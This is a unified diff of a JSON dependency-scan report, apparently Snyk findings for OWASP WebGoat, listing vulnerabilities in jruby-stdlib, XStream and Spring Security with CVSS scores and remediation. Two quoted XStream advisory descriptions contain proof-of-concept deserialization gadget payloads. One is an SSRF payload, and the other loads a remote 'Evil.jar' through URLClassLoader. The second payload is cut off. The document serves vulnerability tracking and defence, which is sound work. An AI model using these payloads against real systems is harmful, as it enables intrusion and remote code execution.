+          "description": "## Overview\n[org.jruby:jruby-stdlib](https://www.jruby.org/) is a JRuby Lib Setup package.\n\nAffected versions of this package are vulnerable to Memory Allocation with Excessive Size Value in the `ResponseReader` class. An attacker can cause the application to allocate excessive memory and trigger a denial of service by including \"literal\" strings in responses sent to client-initiated connections and IMAP commands. \r\n\r\nAfter implementing the fix, the default `max_response_size` is still high (512MiB) to accommodate backward compatibility. It is recommended to set a lower `max_response_size` if connecting to untrusted servers or using insecure connections.\n## Remediation\nA fix was pushed into the `master` branch but not yet published.\n## References\n- [GitHub Commit](https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/442)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/445)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/446)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/447)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2362749)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
+                { "name": "org.asciidoctor:asciidoctorj", "version": "3.0.0" },
+                { "name": "org.jruby:jruby", "version": "10.0.0.1" },
+                { "name": "org.jruby:jruby-stdlib", "version": "10.0.0.1" }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000030-0000-4000-8000-000000000030",
+          "key": "00000000-0000-0000-0000-000000000002",
           "locations": [
             {
               "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
+                "name": "org.jruby:jruby-stdlib",
+                "version": "10.0.0.1"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 275
-            }
+          "problems": [
+            { "id": "GHSA-j3g3-5qv5-52mj", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,9.4.13.0)", "[10.0.0.0,]"],
+              "created_at": "2025-06-27T12:44:09.940948Z",
+              "credits": ["Masamune"],
+              "cvss_base_score": 7.1,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 7.1,
+                  "cvss_version": "4.0",
+                  "modified_at": "2025-06-27T12:44:10.227685Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+                },
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-06-27T12:44:10.227685Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-05-13T01:13:47.511048Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 6.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-04-29T14:04:00.892127Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
+              "disclosed_at": "2025-04-28T16:02:04Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.35916",
+                "probability": "0.00148"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "not defined",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "not defined",
+                    "type": "primary"
+                  }
+                ],
+                "sources": []
+              },
+              "id": "SNYK-JAVA-ORGJRUBY-10557729",
+              "initially_fixed_in_versions": [],
+              "is_fixable": false,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-06-27T12:44:10.227685Z",
+              "package_name": "org.jruby:jruby-stdlib",
+              "package_version": "",
+              "published_at": "2025-06-27T12:44:10.216989Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105%23diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462"
+                },
+                {
+                  "title": "GitHub PR",
+                  "url": "https://github.com/ruby/net-imap/pull/442"
+                },
+                {
+                  "title": "GitHub PR",
+                  "url": "https://github.com/ruby/net-imap/pull/445"
+                },
+                {
+                  "title": "GitHub PR",
+                  "url": "https://github.com/ruby/net-imap/pull/446"
+                },
+                {
+                  "title": "GitHub PR",
+                  "url": "https://github.com/ruby/net-imap/pull/447"
+                },
+                {
+                  "title": "Red Hat Bugzilla Bug",
+                  "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2362749"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CVE-2025-43857", "source": "cve" },
+            { "id": "CWE-789", "source": "cwe" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 84 } },
+          "suppression": {
+            "created_at": "2025-11-11T08:24:09.272Z",
+            "justification": "None Given",
+            "path": ["*"],
+            "policy": "local_policy",
+            "status": "ignored"
           },
-          "title": "Arbitrary Code Execution"
+          "title": "Memory Allocation with Excessive Size Value"
         },
-        "id": "00000030-0000-4000-8000-000000000030",
+        "id": "00000000-0000-0000-0000-000000000002",
         "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000030-0000-4000-8000-000000000030",
-              "type": "fixes"
-            }
-          }
-        },
+        "relationships": {},
         "type": "findings"
       },
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework.security:spring-security-core](http://spring.io/spring-security) is a package that provides security services for the Spring IO Platform.\n\nAffected versions of this package are vulnerable to Improper Access Control when the application uses `AuthenticatedVoter` directly and a `null` authentication parameter is passed to it. Exploiting this vulnerability resulting in an erroneous `true` return value.\r\n\r\n**Note**\r\n\r\nUsers are not affected if:\r\n\r\n1) The application does not use `AuthenticatedVoter#vote` directly.\r\n\r\n2) The application does not pass `null` to `AuthenticatedVoter#vote`.\n## Remediation\nUpgrade `org.springframework.security:spring-security-core` to version 5.7.12, 5.8.11, 6.0.10, 6.1.8, 6.2.3 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/a972338e1dacf82e9cbb669b04678e4d09eae695)\n- [GitHub Issue](https://github.com/spring-projects/spring-security/issues/14666)\n- [Security Advisory](https://spring.io/security/cve-2024-22257)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available (SSRF) only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n          \u003cis class='java.io.SequenceInputStream'\u003e\r\n            \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n              \u003citerator class='com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator'\u003e\r\n                \u003cconfigs class='sun.misc.FIFOQueueEnumerator'\u003e\r\n                  \u003cqueue\u003e\r\n                    \u003clength\u003e1\u003c/length\u003e\r\n                    \u003chead\u003e\r\n                      \u003cobj class='url'\u003ehttp://localhost:8080/internal/\u003c/obj\u003e\r\n                    \u003c/head\u003e\r\n                    \u003ctail reference='../head'/\u003e\r\n                  \u003c/queue\u003e\r\n                  \u003ccursor reference='../queue/head'/\u003e\r\n                \u003c/configs\u003e\r\n                \u003creturned class='sorted-set'/\u003e\r\n              \u003c/iterator\u003e\r\n              \u003ctype\u003eKEYS\u003c/type\u003e\r\n            \u003c/e\u003e\r\n            \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n              \u003cbuf\u003e\u003c/buf\u003e\r\n              \u003cpos\u003e0\u003c/pos\u003e\r\n              \u003cmark\u003e0\u003c/mark\u003e\r\n              \u003ccount\u003e0\u003c/count\u003e\r\n            \u003c/in\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n## References\n- [GitHub Advisory](https://github.com/x-stream/xstream/security/advisories/GHSA-f6hm-88x3-mfjv)\n- [XStream Advisory](https://x-",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.security:spring-security-core",
-                  "version": "6.1.5"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000031-0000-4000-8000-000000000031",
+          "key": "00000000-0000-0000-0000-000000000003",
           "locations": [
             {
               "package": {
-                "name": "org.springframework.security:spring-security-core",
-                "version": "6.1.5"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 118
-            }
-          },
-          "title": "Improper Access Control"
+          "problems": [
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "GHSA-f6hm-88x3-mfjv", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T13:06:43.43948Z",
+              "credits": ["threedr3am"],
+              "cvss_base_score": 6.1,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:59:49.112948Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.6,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:14.574112Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:58.146634Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:08.625138Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P",
+              "disclosed_at": "2021-03-23T13:05:14Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.90185",
+                "probability": "0.05914"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088336",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:58.146634Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:23.378762Z",
+              "references": [
+                {
+                  "title": "GitHub Advisory",
+                  "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-f6hm-88x3-mfjv"
+                },
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21349.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CVE-2021-21349", "source": "cve" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 169 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000031-0000-4000-8000-000000000031",
+        "id": "00000000-0000-0000-0000-000000000003",
         "links": {},
         "relationships": {
           "fix": {
@@ -13628,21 +637,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework.security:spring-security-core",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                          "version": "3.1.10"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.security:spring-security-core",
-                          "version": "6.1.8"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.16"
                         }
                       ],
                       "is_drop": false
@@ -13651,7 +656,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000031-0000-4000-8000-000000000031",
+              "id": "00000000-0000-0000-0000-000000000003",
               "type": "fixes"
             }
           }
@@ -13661,58 +666,146 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[ch.qos.logback:logback-classic](https://mvnrepository.com/artifact/ch.qos.logback/logback-classic) is a reliable, generic, fast and flexible logging library for Java.\n\nAffected versions of this package are vulnerable to Improper Neutralization of Special Elements via the `JaninoEventEvaluator` extension. An attacker can execute arbitrary code by compromising an existing logback configuration file or injecting an environment variable before program execution.\n## Remediation\nUpgrade `ch.qos.logback:logback-classic` to version 1.3.15, 1.5.13 or higher.\n## References\n- [Additional Information](https://logback.qos.ch/news.html#1.5.13)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/2cb6d520df7592ef1c3a198f1b5df3c10c93e183)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/b44b940cc7d4839e06e31a7d60dca174b99c1aa5)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.15)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary File Deletion. A remote attacker can delete arbitrary known files on the host as long as the executing process has sufficient rights, by manipulating the processed input stream.\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.15 or higher.\n## References\n- [CVE-2020-26259 Details](https://x-stream.github.io/CVE-2020-26259.html)\n- [GitHub Advisory](https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/0bcbf50126a62dfcd65f93a0da0c6d1ae92aa738)\n- [PoC in GitHub](https://github.com/jas502n/CVE-2020-26259)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000032-0000-4000-8000-000000000032",
+          "key": "00000000-0000-0000-0000-000000000004",
           "locations": [
             {
               "package": {
-                "name": "ch.qos.logback:logback-classic",
-                "version": "1.4.11"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 42
-            }
-          },
-          "title": "Improper Neutralization of Special Elements"
+          "problems": [
+            { "id": "CVE-2020-26259", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.15)"],
+              "created_at": "2020-12-16T11:01:31.348811Z",
+              "credits": ["Liaogui Zhong"],
+              "cvss_base_score": 5.3,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T14:03:54.078291Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 6.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:16.844109Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 6.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:58.079239Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.4,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:43.204596Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C",
+              "disclosed_at": "2020-12-16T10:53:35Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.99591",
+                "probability": "0.90702"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["PoC in GitHub", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051966",
+              "initially_fixed_in_versions": ["1.4.15"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-07-12T05:20:09.392096Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2020-12-16T17:24:55Z",
+              "references": [
+                {
+                  "title": "CVE-2020-26259 Details",
+                  "url": "https://x-stream.github.io/CVE-2020-26259.html"
+                },
+                {
+                  "title": "GitHub Advisory",
+                  "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/0bcbf50126a62dfcd65f93a0da0c6d1ae92aa738"
+                },
+                {
+                  "title": "PoC in GitHub",
+                  "url": "https://github.com/jas502n/CVE-2020-26259"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "GHSA-jfvx-7wrx-43fh", "source": "ghsa" },
+            { "id": "CWE-22", "source": "cwe" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 343 } },
+          "title": "Arbitrary File Deletion"
         },
-        "id": "00000032-0000-4000-8000-000000000032",
+        "id": "00000000-0000-0000-0000-000000000004",
         "links": {},
         "relationships": {
           "fix": {
@@ -13720,29 +813,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "ch.qos.logback:logback-classic",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-validation",
-                          "version": "3.3.8"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.boot:spring-boot-starter",
-                          "version": "3.3.8"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-logging",
-                          "version": "3.3.8"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-classic",
-                          "version": "1.5.16"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.15"
                         }
                       ],
                       "is_drop": false
@@ -13751,7 +832,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000032-0000-4000-8000-000000000032",
+              "id": "00000000-0000-0000-0000-000000000004",
               "type": "fixes"
             }
           }
@@ -13761,13 +842,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n          \u003cis class='java.io.SequenceInputStream'\u003e\r\n            \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n              \u003citerator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'\u003e\r\n                \u003cnames class='java.util.AbstractList$Itr'\u003e\r\n                  \u003ccursor\u003e0\u003c/cursor\u003e\r\n                  \u003clastRet\u003e-1\u003c/lastRet\u003e\r\n                  \u003cexpectedModCount\u003e0\u003c/expectedModCount\u003e\r\n                  \u003couter-class class='java.util.Arrays$ArrayList'\u003e\r\n                    \u003ca class='string-array'\u003e\r\n                      \u003cstring\u003eEvil\u003c/string\u003e\r\n                    \u003c/a\u003e\r\n                  \u003c/outer-class\u003e\r\n                \u003c/names\u003e\r\n                \u003cprocessorCL class='java.net.URLClassLoader'\u003e\r\n                  \u003cucp class='sun.misc.URLClassPath'\u003e\r\n                    \u003curls serialization='custom'\u003e\r\n                      \u003cunserializable-parents/\u003e\r\n                      \u003cvector\u003e\r\n                        \u003cdefault\u003e\r\n                          \u003ccapacityIncrement\u003e0\u003c/capacityIncrement\u003e\r\n                          \u003celementCount\u003e1\u003c/elementCount\u003e\r\n                          \u003celementData\u003e\r\n                            \u003curl\u003ehttp://127.0.0.1:80/Evil.jar\u003c/url\u003e\r\n                          \u003c/elementData\u003e\r\n                        \u003c/default\u003e\r\n                      \u003c/vector\u003e\r\n                    \u003c/urls\u003e\r\n                    \u003cpath\u003e\r\n                      \u003curl\u003ehttp://127.0.0.1:80/Evil.jar\u003c/url\u003e\r\n                    \u003c/path\u003e\r\n                    \u003cloaders/\u003e\r\n                    \u003clmap/\u003e\r\n                  \u003c/ucp\u003e\r\n                  \u003cpackage2certs class='concurrent-hash-map'/\u003e\r\n                  \u003cclasses/\u003e\r\n                  \u003cdefaultDomain\u003e\r\n                    \u003cclassloader class='java.net.URLClassLoader' reference='../..'/\u003e\r\n                    \u003cprincipals/\u003e\r\n                    \u003chasAllPerm\u003efalse\u003c/hasAllPerm\u003e\r\n                    \u003cstaticPermissions\u003efalse\u003c/staticPermissions\u003e\r\n                    \u003ckey\u003e\r\n                      \u003couter-class reference='../..'/\u003e\r\n                    \u003c/key\u003e\r\n                  \u003c/defaultDomain\u003e\r\n                  \u003cinitialized\u003etrue\u003c/initialized\u003e\r\n                  \u003cpdcache/\u003e\r\n                \u003c/processorCL\u003e\r\n              \u003c/iterator\u003e\r\n              \u003ctype\u003eKEYS\u003c/type\u003e\r\n            \u003c/e\u003e\r\n            \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n              \u003cbuf\u003e\u003c/buf\u003e\r\n              \u003cpos\u003e-2147483648\u003c/pos\u003e\r\n              